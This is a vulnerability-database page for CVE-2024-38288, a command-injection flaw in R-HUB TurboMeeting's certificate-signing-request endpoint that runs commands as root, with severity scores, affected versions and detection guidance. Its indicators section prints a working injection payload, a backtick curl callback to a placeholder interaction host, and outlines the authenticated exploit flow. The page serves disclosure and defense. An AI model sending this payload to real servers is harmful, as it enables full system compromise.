cbcvebase.
CVE-2024-38288
published 2024-07-25

CVE-2024-38288: A command-injection issue in the Certificate Signing Request (CSR) functionality in R-HUB TurboMeeting through 8.x allows authenticated attackers with…

PriorityP258high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
3.22%
86.6th percentile
A command-injection issue in the Certificate Signing Request (CSR) functionality in R-HUB TurboMeeting through 8.x allows authenticated attackers with administrator privileges to execute arbitrary commands on the underlying server as root.

Affected

1 ranges
VendorProductVersion rangeFixed in
rhubcomturbomeeting< 8.08.0

Detection & IOCsextracted from sources · hover to see the quote

url/as/wapi/login
url/as/wapi/generate_csr
commandsid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR
path/as/wapi/profile_entry
  • Monitor POST requests to /as/wapi/generate_csr containing shell metacharacters (backticks, percent-encoded quotes, pipe characters) in the common_name, company_name, state, city, or country fields — these indicate command injection attempts in the CSR generation endpoint.
  • Alert on successful authentication to /as/wapi/login followed immediately by a POST to /as/wapi/generate_csr within the same session (sid), especially from admin accounts, as this matches the exploit flow.
  • Look for outbound DNS or HTTP callbacks (e.g., curl to external hosts) originating from the TurboMeeting server process, which may indicate successful command injection via the CSR feature.
  • The session ID (sid) is extracted from a redirect URL pattern after login; monitor for automated extraction of sid values followed by CSR generation requests as a sign of scripted exploitation.
  • ·Exploitation requires valid administrator credentials — this is a post-authentication vulnerability, so detections should be scoped to authenticated admin sessions.
  • ·The injected commands execute as root on the underlying server, meaning successful exploitation grants full system compromise; prioritize detection and response accordingly.
  • ·The vulnerability affects R-HUB TurboMeeting through version 8.x; ensure detection rules are applied to all instances up to and including the 8.x branch.
  • ·The exploit template uses a 20-second timeout for the CSR request, suggesting the injected command may introduce a delay; network-level detections should account for unusually long response times on /as/wapi/generate_csr.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.